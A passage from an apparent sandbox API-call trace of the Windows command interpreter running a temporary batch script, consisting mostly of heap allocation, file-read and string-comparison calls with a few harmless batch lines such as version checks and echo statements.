BaseAddress=0x19a8f1facf0) returned 1 [0179.364] GetProcessHeap () returned 0x19a8f1e0000 [0179.364] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201140) returned 1 [0179.364] GetProcessHeap () returned 0x19a8f1e0000 [0179.364] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cb0) returned 1 [0179.364] GetProcessHeap () returned 0x19a8f1e0000 [0179.365] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20c050) returned 1 [0179.365] GetProcessHeap () returned 0x19a8f1e0000 [0179.365] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0000) returned 1 [0179.365] GetProcessHeap () returned 0x19a8f1e0000 [0179.365] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0179.365] GetProcessHeap () returned 0x19a8f1e0000 [0179.366] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0179.366] GetProcessHeap () returned 0x19a8f1e0000 [0179.366] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1faef0) returned 1 [0179.366] GetProcessHeap () returned 0x19a8f1e0000 [0179.367] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2010e0) returned 1 [0179.367] GetProcessHeap () returned 0x19a8f1e0000 [0179.367] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f211da0) returned 1 [0179.367] GetProcessHeap () returned 0x19a8f1e0000 [0179.368] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea900) returned 1 [0179.368] GetProcessHeap () returned 0x19a8f1e0000 [0179.368] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0179.368] GetProcessHeap () returned 0x19a8f1e0000 [0179.368] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8f50) returned 1 [0179.368] GetProcessHeap () returned 0x19a8f1e0000 [0179.369] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201080) returned 1 [0179.369] GetProcessHeap () returned 0x19a8f1e0000 [0179.369] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0179.369] GetProcessHeap () returned 0x19a8f1e0000 [0179.369] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20be30) returned 1 [0179.369] GetProcessHeap () returned 0x19a8f1e0000 [0179.370] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efd90) returned 1 [0179.370] GetProcessHeap () returned 0x19a8f1e0000 [0179.370] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0179.370] GetProcessHeap () returned 0x19a8f1e0000 [0179.370] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dd80) returned 1 [0179.371] GetProcessHeap () returned 0x19a8f1e0000 [0179.371] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9400) returned 1 [0179.371] GetProcessHeap () returned 0x19a8f1e0000 [0179.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dd20) returned 1 [0179.372] GetProcessHeap () returned 0x19a8f1e0000 [0179.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dce0) returned 1 [0179.372] GetProcessHeap () returned 0x19a8f1e0000 [0179.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dca0) returned 1 [0179.373] GetProcessHeap () returned 0x19a8f1e0000 [0179.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dc00) returned 1 [0179.373] GetProcessHeap () returned 0x19a8f1e0000 [0179.374] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dbb0) returned 1 [0179.374] GetProcessHeap () returned 0x19a8f1e0000 [0179.374] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20db10) returned 1 [0179.374] GetProcessHeap () returned 0x19a8f1e0000 [0179.375] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20dac0) returned 1 [0179.375] GetProcessHeap () returned 0x19a8f1e0000 [0179.375] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20da80) returned 1 [0179.375] GetProcessHeap () returned 0x19a8f1e0000 [0179.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20da00) returned 1 [0179.376] GetProcessHeap () returned 0x19a8f1e0000 [0179.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.376] GetProcessHeap () returned 0x19a8f1e0000 [0179.377] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207950) returned 1 [0179.377] GetProcessHeap () returned 0x19a8f1e0000 [0179.377] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207900) returned 1 [0179.377] GetProcessHeap () returned 0x19a8f1e0000 [0179.378] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2078c0) returned 1 [0179.379] GetProcessHeap () returned 0x19a8f1e0000 [0179.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.379] GetProcessHeap () returned 0x19a8f1e0000 [0179.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0179.379] GetProcessHeap () returned 0x19a8f1e0000 [0179.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd20) returned 1 [0179.379] GetProcessHeap () returned 0x19a8f1e0000 [0179.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca80) returned 1 [0179.379] GetProcessHeap () returned 0x19a8f1e0000 [0179.379] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8c40) returned 1 [0179.380] GetProcessHeap () returned 0x19a8f1e0000 [0179.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efcd0) returned 1 [0179.380] GetProcessHeap () returned 0x19a8f1e0000 [0179.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecae0) returned 1 [0179.380] GetProcessHeap () returned 0x19a8f1e0000 [0179.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0179.380] GetProcessHeap () returned 0x19a8f1e0000 [0179.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0179.380] GetProcessHeap () returned 0x19a8f1e0000 [0179.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f30) returned 1 [0179.381] GetProcessHeap () returned 0x19a8f1e0000 [0179.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd00) returned 1 [0179.381] GetProcessHeap () returned 0x19a8f1e0000 [0179.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0bb0) returned 1 [0179.382] GetProcessHeap () returned 0x19a8f1e0000 [0179.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ef0) returned 1 [0179.382] GetProcessHeap () returned 0x19a8f1e0000 [0179.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0179.382] GetProcessHeap () returned 0x19a8f1e0000 [0179.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0179.383] GetProcessHeap () returned 0x19a8f1e0000 [0179.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0179.383] GetProcessHeap () returned 0x19a8f1e0000 [0179.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0179.383] GetProcessHeap () returned 0x19a8f1e0000 [0179.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0179.383] GetProcessHeap () returned 0x19a8f1e0000 [0179.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0179.384] GetProcessHeap () returned 0x19a8f1e0000 [0179.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0179.385] GetProcessHeap () returned 0x19a8f1e0000 [0179.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0179.385] GetProcessHeap () returned 0x19a8f1e0000 [0179.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0179.386] GetProcessHeap () returned 0x19a8f1e0000 [0179.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec920) returned 1 [0179.386] GetProcessHeap () returned 0x19a8f1e0000 [0179.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0179.387] GetProcessHeap () returned 0x19a8f1e0000 [0179.387] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.387] GetProcessHeap () returned 0x19a8f1e0000 [0179.387] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0179.387] GetProcessHeap () returned 0x19a8f1e0000 [0179.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0179.388] GetProcessHeap () returned 0x19a8f1e0000 [0179.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0179.388] GetProcessHeap () returned 0x19a8f1e0000 [0179.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0179.388] GetProcessHeap () returned 0x19a8f1e0000 [0179.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0179.388] GetProcessHeap () returned 0x19a8f1e0000 [0179.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0179.389] GetProcessHeap () returned 0x19a8f1e0000 [0179.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0179.389] GetProcessHeap () returned 0x19a8f1e0000 [0179.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca40) returned 1 [0179.389] GetProcessHeap () returned 0x19a8f1e0000 [0179.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0179.389] GetProcessHeap () returned 0x19a8f1e0000 [0179.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0179.390] GetProcessHeap () returned 0x19a8f1e0000 [0179.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0179.390] GetProcessHeap () returned 0x19a8f1e0000 [0179.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6a0) returned 1 [0179.390] GetProcessHeap () returned 0x19a8f1e0000 [0179.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0179.391] GetProcessHeap () returned 0x19a8f1e0000 [0179.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0179.391] GetProcessHeap () returned 0x19a8f1e0000 [0179.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec960) returned 1 [0179.391] GetProcessHeap () returned 0x19a8f1e0000 [0179.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0179.392] GetProcessHeap () returned 0x19a8f1e0000 [0179.392] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0179.392] GetProcessHeap () returned 0x19a8f1e0000 [0179.393] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0179.393] GetProcessHeap () returned 0x19a8f1e0000 [0179.393] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8f00) returned 1 [0179.393] GetProcessHeap () returned 0x19a8f1e0000 [0179.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.394] GetProcessHeap () returned 0x19a8f1e0000 [0179.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8d60) returned 1 [0179.394] GetProcessHeap () returned 0x19a8f1e0000 [0179.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0179.395] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.395] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6e [0179.395] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.396] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7024, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b70 [0179.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\nnot [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 2 [0179.396] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.396] GetFileType (hFile=0xa0) returned 0x1 [0179.396] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.396] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b70 [0179.396] GetProcessHeap () returned 0x19a8f1e0000 [0179.396] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.397] GetProcessHeap () returned 0x19a8f1e0000 [0179.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.397] _tell (_FileHandle=3) returned 7024 [0179.397] _close (_FileHandle=3) returned 0 [0179.398] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.398] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.398] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.398] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7024, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b70 [0179.398] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.399] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b70 [0179.399] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.399] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7042, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b82 [0179.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined old (\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined old (\r\necho \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 18 [0179.399] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.399] GetFileType (hFile=0xa0) returned 0x1 [0179.399] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.399] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b82 [0179.399] GetProcessHeap () returned 0x19a8f1e0000 [0179.399] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.399] GetProcessHeap () returned 0x19a8f1e0000 [0179.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.400] _wcsicmp (_String1="if", _String2=")") returned 64 [0179.400] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0179.400] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0179.400] _wcsicmp (_String1="IF", _String2="if") returned 0 [0179.400] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0179.400] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0179.401] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec700 [0179.401] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0cb0 [0179.401] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0cb0, Size=0x22) returned 0x19a8f1eb800 [0179.401] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x22 [0179.401] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0179.401] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0179.401] GetProcessHeap () returned 0x19a8f1e0000 [0179.401] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0179.401] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0179.401] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0179.402] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0179.402] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0179.402] GetProcessHeap () returned 0x19a8f1e0000 [0179.402] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec660 [0179.402] GetProcessHeap () returned 0x19a8f1e0000 [0179.402] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0179.402] GetProcessHeap () returned 0x19a8f1e0000 [0179.402] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb770, Size=0x1a) returned 0x19a8f1eb860 [0179.402] GetProcessHeap () returned 0x19a8f1e0000 [0179.402] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1a [0179.402] GetProcessHeap () returned 0x19a8f1e0000 [0179.402] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0179.402] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.402] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b82 [0179.403] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.403] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7097, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1bb9 [0179.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ________________________________________________\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo ________________________________________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 55 [0179.403] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.403] GetFileType (hFile=0xa0) returned 0x1 [0179.403] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.403] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1bb9 [0179.403] GetProcessHeap () returned 0x19a8f1e0000 [0179.403] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.403] GetProcessHeap () returned 0x19a8f1e0000 [0179.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.404] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.404] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.404] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.404] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.404] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.404] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.404] GetProcessHeap () returned 0x19a8f1e0000 [0179.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0179.404] GetProcessHeap () returned 0x19a8f1e0000 [0179.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0179.404] GetProcessHeap () returned 0x19a8f1e0000 [0179.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1eeea0 [0179.404] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.404] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1bb9 [0179.404] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.405] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7106, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1bc2 [0179.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="%eline%\r\n____________________________________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 9 [0179.405] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.405] GetFileType (hFile=0xa0) returned 0x1 [0179.405] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.405] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1bc2 [0179.405] GetProcessHeap () returned 0x19a8f1e0000 [0179.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.405] GetProcessHeap () returned 0x19a8f1e0000 [0179.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.405] GetProcessHeap () returned 0x19a8f1e0000 [0179.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0179.405] GetEnvironmentVariableW (in: lpName="eline", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0179.405] GetProcessHeap () returned 0x19a8f1e0000 [0179.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0179.406] GetProcessHeap () returned 0x19a8f1e0000 [0179.406] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.407] GetProcessHeap () returned 0x19a8f1e0000 [0179.407] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.407] GetProcessHeap () returned 0x19a8f1e0000 [0179.407] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0179.407] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0179.407] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0179.408] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0179.408] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0179.408] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0179.408] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecd20 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0179.408] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.408] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.408] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.408] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.408] _wcsicmp (_String1="REM", 